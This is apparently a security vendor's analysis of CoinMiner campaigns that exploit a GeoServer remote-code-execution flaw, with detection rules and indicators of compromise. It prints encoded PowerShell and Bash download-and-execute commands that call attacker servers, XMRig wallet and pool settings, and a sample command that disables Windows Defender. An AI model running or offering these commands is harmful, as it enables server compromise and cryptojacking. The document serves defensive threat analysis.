GeoServer, Where Various CoinMiner Attacks Occur

AhnLab SEcurity intelligence Center (ASEC) previously covered threat actors exploiting the GeoServer vulnerability to install CoinMiner and NetCat in the blog post “CoinMiner Attacks Exploiting GeoServer Vulnerability”. [1] Since then, threat actors have continued to target vulnerable GeoServers to install CoinMiner. This post covers the CoinMiner installation cases identified since that report.


1. GeoServer

GeoServer is an open-source Geographic Information System (GIS) server written in Java that serves and processes geographic and spatial data. In 2024, a vulnerability (CVE-2024-36401) was disclosed that allows unauthenticated remote code execution: unsafe evaluation of OGC request parameters as XPath expressions lets a crafted request run arbitrary code on the server. Threat actors have been exploiting it since to install malware.

In September 2024, Fortinet disclosed attack cases in which threat actors exploited CVE-2024-36401 to distribute malware such as GOREVERSE, SideWalk, Mirai, Condi and CoinMiner. [2] Trend Micro also published a report on the Earth Baxia threat actor's campaign, which exploited CVE-2024-36401 and used spear-phishing in attacks against local organizations in Taiwan. [3]

The exact exploitation details could not be recovered in the cases below, but every affected host was running a vulnerable GeoServer version, which indicates that the threat actors exploited this known vulnerability.


2. Cases of CoinMiner Attacks

2.1. Type A

Type A is the threat actor introduced in the previous post, still using the same wallet address. The actor exploited vulnerable GeoServers to execute the PowerShell command below and used “bash.exe” to run the Bash one-liner that follows it.

> powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMgAyADAALgA4ADQALgAxADAANwAuADYAOQAvAGoAcwAvAGcAdwAuAHQAeAB0ACcAKQA=
> bash -c {echo,Y3VybCAtZnNTTCBodHRwOi8vMjIwLjg0LjEwNy42OS9qcy9nbC50eHQgfHNoCg==}|{base64,-d}|{bash,-i}

The PowerShell command decodes (from UTF-16LE base64) to IEX (New-Object Net.WebClient).DownloadString('http://220.84.107[.]69/js/gw.txt'), and the Bash one-liner to curl -fsSL http://220.84.107[.]69/js/gl.txt | sh. The downloaded Batch script “gw.txt” (Windows) or Bash script “gl.txt” (Linux) then fetches and installs the remaining payloads, including the XMRig CoinMiner, from the addresses shown in Figure 1. The installation process on both Windows and Linux is the same as before; only the payloads and download addresses have changed. The XMRig configuration recovered from this case is as follows:

Figure 1. URL where the malware was uploaded

  • url – 1 : pool.supportxmr[.]com:443
  • url – 2 : 104.243.43[.]115:443
  • user : 47DsNc5pK8rYBQF4ev3mNBct3tkkHuUmxeqCSSbX3YuBhXweSB9XeQbcPMqEBaSJy4bGrPxbdMJkphrVQ5AmastoEMpSjcU
  • pass : x

The same threat actor is also distributing CoinMiner to WebLogic servers using the command below, which decodes to a download of “wi.txt” from 119.194.153[.]31:8080. They appear to scan internet-exposed systems and install CoinMiner on whichever vulnerable service they find.

> powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAxADkALgAxADkANAAuADEANQAzAC4AMwAxADoAOAAwADgAMAAvAGkAYwBvAG4ALwBqAHMALwB3AGkALgB0AHgAdAAnACk

Figure 2. CoinMiner installation command executed via the WebLogic service

  • url – 1 : pool.supportxmr[.]com:80
  • user : 47KoSaQXtpZ2AypuUm6pBgfUjfUuS1Fiy2jJRajdztpzGHrtLk3qPtQExCMd9PuRkBWPU4tDfoT7jXnYJPyEpDiF6qNuR7R
  • pass : x


2.2. Type B

Another threat actor installed its malware with the certutil command, a built-in Windows tool commonly abused as a downloader. The initial payload is a RAR SFX dropper that contains XMRig and its configuration.

Figure 3. Malware installation behavior using certutil

Upon execution, the dropper writes its components to the “C:\Program Files\Java\jre1.9.2_251” directory, a path chosen to look like a JRE installation, and then runs “3.bat”. “3.bat” uses NSSM to register a service that runs “java.exe”, which is in fact XMRig disguised as the Java launcher “javaws.exe” in the “bin” folder.

Figure 4. Internal files of the Dropper malware

This XMRig build is the threat actor's own: it does not read an external configuration file such as “config.json” but carries its settings inside the binary. “javap.exe” is a loader that reads and decrypts the “hello.dat” file in the same directory and executes the result in memory. The decrypted file is XMRig, and like the previous type it embeds configuration such as the mining pool URLs:

Figure 5. Configuration information included in XMRig

  • url – 1 : ssl.aaaaaaaa[.]cyou:9655
  • url – 2 : ssl.aaaaaaaa[.]cyou:9654
  • url – 3 : xmr.aaaaaaaa[.]cyou:1110
  • url – 4 : aaaaaaaa[.]cyou:443
  • url – 5 : asia.aaaaaaaa[.]cyou:1110
  • url – 6 : us.aaaaaaaa[.]cyou:1110
  • url – 7 : eu.aaaaaaaa[.]cyou:1110
  • user : 45PX6QS4EhgRC1YbPNPRz8GmhyF7N4WVxQssZnhhc7xodKNNrQiEqxz9uQEMD6e8isjHVHt3Vk9Nqh5HMRgjVw4RC61FY5W
  • pass – 1 : x1999
  • pass – 2 : x


2.3. Type C

The last threat actor is known not only for CoinMiner but also for installing AnyDesk and using a self-developed downloader. At the time of analysis the download link was no longer available, so the payload it delivered is unknown.

Through GeoServer, the threat actor executed PowerShell commands that installed the Batch malware “setupcache.bat”, which in turn installs XMRig. “Setup_AnyDesk.bat” was not recovered, but its name suggests a Batch script that installs AnyDesk.

setupcache.bat downloads the archive “caches.zip”, which contains 7z, NSSM and XMRig; it extracts the archive with 7z and registers XMRig as a service with NSSM. Across the observed attacks, at least five download URLs have been identified, and the archive has also been named “cache.zip”, “w3wp.zip” and “iis.zip” (the latter two mimic IIS components; w3wp is the name of the IIS worker process).

Figure 6. Batch malware responsible for the downloader feature

They also attempted to install their custom downloader “systemd” (named after the Linux init system), adding an exclusion path to Windows Defender and disabling it in the process. The downloader fetches payloads from the C&C server and executes them in memory; because the download was no longer possible at the time of analysis, the final malware is unknown.

Figure 7. Routine of bypassing Windows Defender and installing the downloader

The XMRig configuration used by this type, with pool addresses on port 9200, is as follows:

  • url – 1 : www[.]combilke[.]top:9200
  • url – 2 : www[.]combilkee[.]top:9200
  • url – 3 : www[.]cloudsecure[.]top:9200
  • url – 4 : 154.89.152[.]204:9200
  • url – 5 : 203.91.76[.]58:9200
  • user : 49Qp2aEzUdEANd88muJEvDVKEzn9xbm5xEXjZ8QUeN1ndVxvtUuSjZAecFJHabrzYE2VXTu5sZM8H5GiKfKah1VJBwuWhYc
  • pass – 1 : k2_7
  • pass – 2 : k2_2

Figure 8. Downloader malware
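The host-side behaviours described for Type B (certutil download, NSSM registering a renamed XMRig under a fake JRE path) and Type C (7z extraction of the staged archive, NSSM service, Windows Defender exclusion and real-time protection disabled) translate directly into process-creation detection rules. The Python below is an added example, not ASEC's detection content: the log records are constructed, the certutil -urlcache flags and the Add-MpPreference/Set-MpPreference cmdlets are this example's assumptions about how those actions appear on the command line (the post does not quote them), and the XMRig -o/-u/-p arguments and the 95-character Monero address check are standard XMRig and Monero conventions rather than details taken from the samples.

```python
"""Triage rules for the Type B / Type C host behaviours: certutil downloads,
NSSM persistence, staged-archive extraction, Defender tampering and a Monero
wallet on a command line. Added example; records below are constructed."""
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation records (Image, CommandLine).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -urlcache -split -f http://example.invalid/s.rar C:\Users\Public\s.rar"},
    {"image": r"C:\Program Files\Java\jre1.9.2_251\nssm.exe",
     "cmd": r'nssm.exe install java "C:\Program Files\Java\jre1.9.2_251\bin\javaws.exe"'},
    {"image": r"C:\Windows\Temp\7z.exe",
     "cmd": r"7z.exe x caches.zip -oC:\Windows\Temp\cache -y"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell -c "Add-MpPreference -ExclusionPath C:\Windows\Temp; Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"image": r"C:\Windows\Temp\cache\xmrig.exe",
     "cmd": r"xmrig.exe -o pool.supportxmr.com:443 -u 47DsNc5pK8rYBQF4ev3mNBct3tkkHuUmxeqCSSbX3YuBhXweSB9XeQbcPMqEBaSJy4bGrPxbdMJkphrVQ5AmastoEMpSjcU -p x"},
    # Benign control: a real JRE launcher should trip nothing.
    {"image": r"C:\Program Files\Java\jre1.8.0_251\bin\javaws.exe",
     "cmd": r'"C:\Program Files\Java\jre1.8.0_251\bin\javaws.exe" -viewer'},
]

# Monero standard/subaddress: 95 base58 chars starting with 4 or 8.
XMR_WALLET_RE = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")
# Archive names seen across the Type C attacks.
STAGED_ARCHIVES = ("caches.zip", "cache.zip", "w3wp.zip", "iis.zip")

RULES = [
    ("certutil_download", re.compile(r"certutil(?:\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("nssm_service_install", re.compile(r"nssm(?:\.exe)?\s+install\s+\S+", re.I)),
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("defender_realtime_off",
     re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$?true", re.I)),
    ("xmrig_cli_pool", re.compile(r"(?:^|\s)-o\s+\S+:\d+", re.I)),  # -o host:port
]


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules one process-creation record trips."""
    cmd, image = event["cmd"], event["image"].lower()
    hits = [name for name, rx in RULES if rx.search(cmd)]
    if re.search(r"\b7z(?:\.exe)?\s+[xe]\b", cmd, re.I) and any(
            a in cmd.lower() for a in STAGED_ARCHIVES):
        hits.append("staged_archive_extract")
    if XMR_WALLET_RE.search(cmd):
        hits.append("monero_wallet")
    # Type B detail: tooling (NSSM, 7z, the javap.exe loader) living inside a
    # directory posing as a JRE install.
    base = image.rsplit("\\", 1)[-1]
    if base in ("nssm.exe", "7z.exe", "javap.exe") and "\\java\\jre" in image:
        hits.append("tool_in_jre_dir")
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> rule hits, keeping only records that matched."""
    findings: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], hits)
```

No single rule here is conclusive on its own (NSSM and 7z are legitimate tools, and a certutil download may be an administrator's), which is why the evaluation returns every hit per record: a service installed by NSSM from a JRE-look-alike directory, or an exclusion added to Defender immediately before an extraction from "caches.zip", is the combination worth paging on.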


3. Conclusion

Since the GeoServer remote code execution vulnerability (CVE-2024-36401) was disclosed, cases of threat actors exploiting it to install malware continue to be identified. The actors target environments where GeoServer is installed and deploy various coin miners, which consume the system's resources to mine Monero. Where NetCat is installed together with the coin miner, as in the case reported earlier, the actor can also use it to install other malware or steal information from the system. Administrators should update GeoServer to a fixed release (2.23.6, 2.24.4 or 2.25.2 and later), avoid exposing it directly to the internet, and check for the persistence artifacts described above, such as NSSM-registered services pointing at look-alike Java binaries and unexpected Windows Defender exclusions.


MD5

04101ba4061732ed0716f554cb7d6539
05fe0e7e4e181ee77749f334e2d7b10f
1136efb1a46d1f2d508162387f30dc4d
21c5171fb746b93913efdaac328d91bd
2517826a165193105923233e13b418d4

URL

http[:]//119[.]194[.]153[.]31[:]8080/icon/js/config[.]json
http[:]//119[.]194[.]153[.]31[:]8080/icon/js/l[.]txt
http[:]//119[.]194[.]153[.]31[:]8080/icon/js/p[.]sh
http[:]//119[.]194[.]153[.]31[:]8080/icon/js/s[.]rar
http[:]//119[.]194[.]153[.]31[:]8080/icon/js/solrd[.]exe

FQDN

aaaaaaaa[.]cyou
asia[.]aaaaaaaa[.]cyou
eu[.]aaaaaaaa[.]cyou
ssl[.]aaaaaaaa[.]cyou
us[.]aaaaaaaa[.]cyou

IP

104[.]243[.]43[.]115
154[.]89[.]152[.]204
185[.]208[.]156[.]197
203[.]91[.]76[.]58
